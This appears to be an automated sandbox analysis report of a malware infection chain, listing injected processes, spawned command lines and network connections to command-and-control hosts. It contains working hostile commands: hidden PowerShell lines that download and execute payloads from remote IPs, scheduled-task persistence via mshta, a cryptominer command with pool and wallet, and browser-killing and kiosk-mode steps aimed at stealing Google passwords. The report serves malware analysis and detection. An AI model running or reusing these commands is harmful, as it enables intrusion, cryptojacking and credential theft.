PID 3432 wrote to memory of 1940 N/A C:\Windows\Explorer.EXE C:\Windows\System32\notepad.exe
PID 4924 wrote to memory of 2256 N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe
PID 4924 wrote to memory of 2256 N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe
PID 4924 wrote to memory of 2256 N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe
PID 3432 wrote to memory of 1940 N/A C:\Windows\Explorer.EXE C:\Windows\System32\notepad.exe
PID 3432 wrote to memory of 1940 N/A C:\Windows\Explorer.EXE C:\Windows\System32\notepad.exe
PID 3432 wrote to memory of 1940 N/A C:\Windows\Explorer.EXE C:\Windows\System32\notepad.exe
PID 3432 wrote to memory of 1940 N/A C:\Windows\Explorer.EXE C:\Windows\System32\notepad.exe
PID 3432 wrote to memory of 1940 N/A C:\Windows\Explorer.EXE C:\Windows\System32\notepad.exe
PID 3432 wrote to memory of 1940 N/A C:\Windows\Explorer.EXE C:\Windows\System32\notepad.exe
PID 3432 wrote to memory of 1940 N/A C:\Windows\Explorer.EXE C:\Windows\System32\notepad.exe
PID 3432 wrote to memory of 1940 N/A C:\Windows\Explorer.EXE C:\Windows\System32\notepad.exe
PID 3432 wrote to memory of 1940 N/A C:\Windows\Explorer.EXE C:\Windows\System32\notepad.exe
PID 3432 wrote to memory of 1940 N/A C:\Windows\Explorer.EXE C:\Windows\System32\notepad.exe
PID 2668 wrote to memory of 3236 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107410101\31107e887f.exe
PID 2668 wrote to memory of 3236 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107410101\31107e887f.exe
PID 2668 wrote to memory of 3236 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107410101\31107e887f.exe
PID 3432 wrote to memory of 1940 N/A C:\Windows\Explorer.EXE C:\Windows\System32\notepad.exe
PID 2668 wrote to memory of 4360 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe
PID 2668 wrote to memory of 4360 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe
PID 3432 wrote to memory of 1972 N/A C:\Windows\Explorer.EXE C:\Windows\system32\tasklist.exe
PID 3432 wrote to memory of 1972 N/A C:\Windows\Explorer.EXE C:\Windows\system32\tasklist.exe
PID 2668 wrote to memory of 2972 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107440101\3277ecaa2a.exe
PID 2668 wrote to memory of 2972 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107440101\3277ecaa2a.exe
PID 2668 wrote to memory of 2972 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107440101\3277ecaa2a.exe
PID 2972 wrote to memory of 4228 N/A C:\Users\Admin\AppData\Local\Temp\10107440101\3277ecaa2a.exe C:\Windows\SysWOW64\cmd.exe
PID 2972 wrote to memory of 4228 N/A C:\Users\Admin\AppData\Local\Temp\10107440101\3277ecaa2a.exe C:\Windows\SysWOW64\cmd.exe
PID 2972 wrote to memory of 4228 N/A C:\Users\Admin\AppData\Local\Temp\10107440101\3277ecaa2a.exe C:\Windows\SysWOW64\cmd.exe
PID 2972 wrote to memory of 4836 N/A C:\Users\Admin\AppData\Local\Temp\10107440101\3277ecaa2a.exe C:\Windows\SysWOW64\mshta.exe
PID 2972 wrote to memory of 4836 N/A C:\Users\Admin\AppData\Local\Temp\10107440101\3277ecaa2a.exe C:\Windows\SysWOW64\mshta.exe
PID 2972 wrote to memory of 4836 N/A C:\Users\Admin\AppData\Local\Temp\10107440101\3277ecaa2a.exe C:\Windows\SysWOW64\mshta.exe
PID 4228 wrote to memory of 4640 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 4228 wrote to memory of 4640 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 4228 wrote to memory of 4640 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066.exe

"C:\Users\Admin\AppData\Local\Temp\001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066.exe"

C:\Users\Admin\AppData\Local\Temp\J4N7D1D1SFJ8ZZ0MYXJD3P3ZAVUIW9.exe

"C:\Users\Admin\AppData\Local\Temp\J4N7D1D1SFJ8ZZ0MYXJD3P3ZAVUIW9.exe"

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"

C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe

"C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\5995.tmp\5996.tmp\5997.bat C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\Admin\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\Admin\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\installer.ps1"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5muhcagw\5muhcagw.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAB10.tmp" "c:\Users\Admin\AppData\Local\Temp\5muhcagw\CSCE2143F3F87124EFFBE7090E7EC1FD14.TMP"

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\10106910101\ktxzLhN.exe

"C:\Users\Admin\AppData\Local\Temp\10106910101\ktxzLhN.exe"

C:\Users\Admin\AppData\Local\Temp\dll32.exe

"C:\Users\Admin\AppData\Local\Temp\dll32.exe"

C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe

"C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe"

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"

C:\Windows\System32\notepad.exe

--donate-level 2 -o pool.hashvault.pro:443 -u 494k9WqKJKFGDoD9MfnAcjEDcrHMmMNJTUun8rYFRYyPHyoHMJf5sesH79UoM8VfoGYevyzthG86r5BTGYZxmhENTzKajL3 -k -p x --cpu-max-threads-hint=40

C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe

"C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe"

C:\Users\Admin\AppData\Local\Temp\10107410101\31107e887f.exe

"C:\Users\Admin\AppData\Local\Temp\10107410101\31107e887f.exe"

C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe

"C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe"

C:\Windows\system32\tasklist.exe

tasklist /FI "PID eq 1940"

C:\Users\Admin\AppData\Local\Temp\10107440101\3277ecaa2a.exe

"C:\Users\Admin\AppData\Local\Temp\10107440101\3277ecaa2a.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /create /tn hBpNSma7kUh /tr "mshta C:\Users\Admin\AppData\Local\Temp\kAxSdUV2p.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta C:\Users\Admin\AppData\Local\Temp\kAxSdUV2p.hta

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn hBpNSma7kUh /tr "mshta C:\Users\Admin\AppData\Local\Temp\kAxSdUV2p.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'MYLRQMYGX7EXEVV78TDKUAFSWC4JLZP2.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10107450121\am_no.cmd" "

C:\Windows\SysWOW64\timeout.exe

timeout /t 2

C:\Users\Admin\AppData\Local\TempMYLRQMYGX7EXEVV78TDKUAFSWC4JLZP2.EXE

"C:\Users\Admin\AppData\Local\TempMYLRQMYGX7EXEVV78TDKUAFSWC4JLZP2.EXE"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp3D4D.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp3D4D.tmp.bat

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 4264"

C:\Windows\system32\find.exe

find ":"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"

C:\Users\Admin\AppData\Local\Temp\10107460101\09a5b3d3db.exe

"C:\Users\Admin\AppData\Local\Temp\10107460101\09a5b3d3db.exe"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\tasklist.exe

tasklist /FI "PID eq 1940"

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn "R0yhcmahnHj" /tr "mshta \"C:\Temp\WK6TyvNYU.hta\"" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta "C:\Temp\WK6TyvNYU.hta"

C:\Users\Admin\AppData\Roaming\AdminUserCash\tempdatalogger.exe

"C:\Users\Admin\AppData\Roaming\AdminUserCash\tempdatalogger.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;

C:\Users\Admin\AppData\Local\Temp\10107470101\c03b939485.exe

"C:\Users\Admin\AppData\Local\Temp\10107470101\c03b939485.exe"

C:\Users\Admin\AppData\Local\Temp\10107470101\c03b939485.exe

"C:\Users\Admin\AppData\Local\Temp\10107470101\c03b939485.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1584 -ip 1584

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1584 -s 812

C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe

"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

C:\Users\Admin\AppData\Local\Temp\10107480101\b945d3c333.exe

"C:\Users\Admin\AppData\Local\Temp\10107480101\b945d3c333.exe"

C:\Windows\system32\tasklist.exe

tasklist /FI "PID eq 1940"

C:\Users\Admin\AppData\Local\Temp\10107490101\339a55ae62.exe

"C:\Users\Admin\AppData\Local\Temp\10107490101\339a55ae62.exe"

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\ProgramData\nxpsp\mcsq.exe

C:\ProgramData\nxpsp\mcsq.exe

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

C:\Users\Admin\AppData\Local\Temp\10107500101\83c5f6f0d5.exe

"C:\Users\Admin\AppData\Local\Temp\10107500101\83c5f6f0d5.exe"

C:\Windows\system32\tasklist.exe

tasklist /FI "PID eq 1940"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --profile-directory="Default" --headless --disable-gpu

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x10c,0x110,0x114,0xe8,0x118,0x7ffa2898cc40,0x7ffa2898cc4c,0x7ffa2898cc58

C:\Users\Admin\AppData\Local\Temp\10107510101\5e644351a1.exe

"C:\Users\Admin\AppData\Local\Temp\10107510101\5e644351a1.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --headless --use-angle=swiftshader-webgl --headless --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --use-angle=swiftshader-webgl --field-trial-handle=1408,i,14568539947306955284,2076734954859821730,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=1400 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --headless --field-trial-handle=1372,i,14568539947306955284,2076734954859821730,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=1644 /prefetch:3

C:\Users\Admin\AppData\Local\Temp\RBCRUM6KVZ7YTYUB9QJUZBNP2C3075.exe

"C:\Users\Admin\AppData\Local\Temp\RBCRUM6KVZ7YTYUB9QJUZBNP2C3075.exe"

C:\Users\Admin\AppData\Local\Temp\10107520101\8c305bd773.exe

"C:\Users\Admin\AppData\Local\Temp\10107520101\8c305bd773.exe"

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM firefox.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM chrome.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM msedge.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM opera.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM brave.exe /T

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1968 -parentBuildID 20240401114208 -prefsHandle 1884 -prefMapHandle 1876 -prefsLen 26973 -prefMapSize 244628 -appDir "C:\Program Files\Mozilla Firefox\browser" - {89434cc4-5c02-4e46-9952-f5b162d41cf7} 2256 "\\.\pipe\gecko-crash-server-pipe.2256" gpu

C:\Windows\system32\tasklist.exe

tasklist /FI "PID eq 1940"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2404 -parentBuildID 20240401114208 -prefsHandle 2396 -prefMapHandle 2392 -prefsLen 27893 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {bcefe755-ed17-4c92-8eba-b3eeafe2e8c9} 2256 "\\.\pipe\gecko-crash-server-pipe.2256" socket

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2992 -childID 1 -isForBrowser -prefsHandle 2984 -prefMapHandle 2980 -prefsLen 22636 -prefMapSize 244628 -jsInitHandle 1348 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f6aee126-02ba-4091-ab76-345d3946e11b} 2256 "\\.\pipe\gecko-crash-server-pipe.2256" tab

C:\Users\Admin\AppData\Local\Temp\10107530101\b26b6bfdcd.exe

"C:\Users\Admin\AppData\Local\Temp\10107530101\b26b6bfdcd.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4092 -childID 2 -isForBrowser -prefsHandle 4084 -prefMapHandle 4080 -prefsLen 32383 -prefMapSize 244628 -jsInitHandle 1348 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {cf9c54d7-c2d6-4610-affc-978c87b62edd} 2256 "\\.\pipe\gecko-crash-server-pipe.2256" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4224 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4884 -prefMapHandle 4880 -prefsLen 32383 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {cebe1feb-5ef3-4020-a479-6a52580b6948} 2256 "\\.\pipe\gecko-crash-server-pipe.2256" utility

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5312 -childID 3 -isForBrowser -prefsHandle 5296 -prefMapHandle 5304 -prefsLen 27035 -prefMapSize 244628 -jsInitHandle 1348 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5accf423-98c0-444c-800e-ed14ca4b0c51} 2256 "\\.\pipe\gecko-crash-server-pipe.2256" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5468 -childID 4 -isForBrowser -prefsHandle 5424 -prefMapHandle 5324 -prefsLen 27035 -prefMapSize 244628 -jsInitHandle 1348 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {dc5080e6-9ef4-4303-b2b8-56c721da26ab} 2256 "\\.\pipe\gecko-crash-server-pipe.2256" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5660 -childID 5 -isForBrowser -prefsHandle 5616 -prefMapHandle 5428 -prefsLen 27035 -prefMapSize 244628 -jsInitHandle 1348 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {54817f4f-d0e9-4663-8819-257164c54489} 2256 "\\.\pipe\gecko-crash-server-pipe.2256" tab

C:\Users\Admin\AppData\Local\Temp\10107540101\cnntXtU.exe

"C:\Users\Admin\AppData\Local\Temp\10107540101\cnntXtU.exe"

C:\Users\Admin\AppData\Local\Temp\10107550101\nhDLtPT.exe

"C:\Users\Admin\AppData\Local\Temp\10107550101\nhDLtPT.exe"

C:\Users\Admin\AppData\Local\Temp\10107560101\ktxzLhN.exe

"C:\Users\Admin\AppData\Local\Temp\10107560101\ktxzLhN.exe"

C:\Users\Admin\AppData\Local\Temp\dll32.exe

"C:\Users\Admin\AppData\Local\Temp\dll32.exe"

C:\Windows\system32\tasklist.exe

tasklist /FI "PID eq 1940"

C:\Users\Admin\AppData\Local\Temp\10107570101\Ps7WqSx.exe

"C:\Users\Admin\AppData\Local\Temp\10107570101\Ps7WqSx.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 circujitstorm.bet udp
US 8.8.8.8:53 explorebieology.run udp
US 8.8.8.8:53 gadgethgfub.icu udp
US 8.8.8.8:53 moderzysics.top udp
US 172.67.189.66:443 moderzysics.top tcp
US 172.67.189.66:443 moderzysics.top tcp
US 172.67.189.66:443 moderzysics.top tcp
US 172.67.189.66:443 moderzysics.top tcp
US 172.67.189.66:443 moderzysics.top tcp
US 172.67.189.66:443 moderzysics.top tcp
US 172.67.189.66:443 moderzysics.top tcp
RU 176.113.115.7:80 176.113.115.7 tcp
RU 176.113.115.6:80 176.113.115.6 tcp
RU 176.113.115.7:80 176.113.115.7 tcp
NL 45.144.212.77:16000 45.144.212.77 tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 pastebin.com udp
US 104.20.3.235:443 pastebin.com tcp
RU 176.113.115.7:80 176.113.115.7 tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.110.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 cobolrationumelawrtewarms.com udp
NL 107.189.27.66:80 cobolrationumelawrtewarms.com tcp
LU 45.59.120.8:80 45.59.120.8 tcp
US 8.8.8.8:53 gadgethgfub.icu udp
US 8.8.8.8:53 explorebieology.run udp
US 172.67.189.66:443 moderzysics.top tcp
US 172.67.189.66:443 moderzysics.top tcp
US 8.8.8.8:53 pool.hashvault.pro udp
US 172.67.189.66:443 moderzysics.top tcp
DE 192.248.189.11:443 pool.hashvault.pro tcp
RU 176.113.115.7:80 176.113.115.7 tcp
US 172.67.189.66:443 moderzysics.top tcp
US 172.67.189.66:443 moderzysics.top tcp
US 172.67.189.66:443 moderzysics.top tcp
US 172.67.189.66:443 moderzysics.top tcp
RU 176.113.115.7:80 176.113.115.7 tcp
NL 45.154.98.175:6969 tcp
US 185.199.110.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 exarthynature.run udp
US 104.21.96.1:443 exarthynature.run tcp
RU 176.113.115.7:80 176.113.115.7 tcp
US 104.21.96.1:443 exarthynature.run tcp
US 104.21.96.1:443 exarthynature.run tcp
US 104.21.96.1:443 exarthynature.run tcp
US 104.21.96.1:443 exarthynature.run tcp
US 104.21.96.1:443 exarthynature.run tcp
US 104.21.96.1:443 exarthynature.run tcp
NL 185.156.73.73:80 185.156.73.73 tcp
US 8.8.8.8:53 dawtastream.bet udp
US 8.8.8.8:53 foresctwhispers.top udp
US 8.8.8.8:53 tracnquilforest.life udp
US 8.8.8.8:53 collapimga.fun udp
US 8.8.8.8:53 seizedsentec.online udp
US 8.8.8.8:53 strawpeasaen.fun udp
US 8.8.8.8:53 quietswtreams.life udp
US 8.8.8.8:53 starrynsightsky.icu udp
US 8.8.8.8:53 earthsymphzony.today udp
US 8.8.8.8:53 steamcommunity.com udp
GB 104.124.170.33:443 steamcommunity.com tcp
US 8.8.8.8:53 farmingtzricks.top udp
US 104.21.24.225:443 farmingtzricks.top tcp
US 104.21.24.225:443 farmingtzricks.top tcp
US 104.21.24.225:443 farmingtzricks.top tcp
US 104.21.24.225:443 farmingtzricks.top tcp
US 104.21.24.225:443 farmingtzricks.top tcp
US 104.21.24.225:443 farmingtzricks.top tcp
US 104.21.24.225:443 farmingtzricks.top tcp
NL 185.156.73.73:80 185.156.73.73 tcp
US 8.8.8.8:53 croprojegies.run udp
US 104.21.16.1:443 croprojegies.run tcp
US 104.21.16.1:443 croprojegies.run tcp
US 104.21.16.1:443 croprojegies.run tcp
US 104.21.16.1:443 croprojegies.run tcp
US 8.8.8.8:53 google.com udp
US 8.8.8.8:53 api.telegram.org udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 104.21.16.1:443 croprojegies.run tcp
US 104.21.16.1:443 croprojegies.run tcp
US 104.21.16.1:443 croprojegies.run tcp
RU 176.113.115.7:80 176.113.115.7 tcp
RU 45.93.20.28:80 45.93.20.28 tcp
N/A 127.0.0.1:9222 tcp
N/A 127.0.0.1:9222 tcp
N/A 127.0.0.1:50649 tcp
N/A 127.0.0.1:50658 tcp
US 8.8.8.8:53 youtube.com udp
US 8.8.8.8:53 youtube.com udp
GB 142.250.187.206:443 youtube.com tcp
GB 142.250.187.206:443 youtube.com tcp
US 8.8.8.8:53 spocs.getpocket.com udp
US 8.8.8.8:53 firefox-api-proxy.cdn.mozilla.net udp
US 8.8.8.8:53 youtube.com udp
US 8.8.8.8:53 prod.ads.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net udp
US 34.149.97.1:443 firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 prod.ads.prod.webservices.mozgcp.net udp
US 34.149.97.1:443 firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net tcp
GB 142.250.187.206:443 youtube.com udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 www.youtube.com udp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
US 8.8.8.8:53 youtube-ui.l.google.com udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
GB 172.217.16.238:443 youtube-ui.l.google.com tcp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 youtube-ui.l.google.com udp
GB 172.217.16.238:443 youtube-ui.l.google.com udp
US 8.8.8.8:53 consent.youtube.com udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
GB 216.58.213.14:443 consent.youtube.com tcp
US 8.8.8.8:53 consent.youtube.com udp
US 8.8.8.8:53 consent.youtube.com udp
GB 216.58.213.14:443 consent.youtube.com udp
US 8.8.8.8:53 firefox-settings-attachments.cdn.mozilla.net udp
US 34.107.152.202:443 firefox-settings-attachments.cdn.mozilla.net tcp
US 8.8.8.8:53 attachments.prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 attachments.prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 tracking-protection.cdn.mozilla.net udp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 8.8.8.8:53 tracking-protection.prod.mozaws.net udp
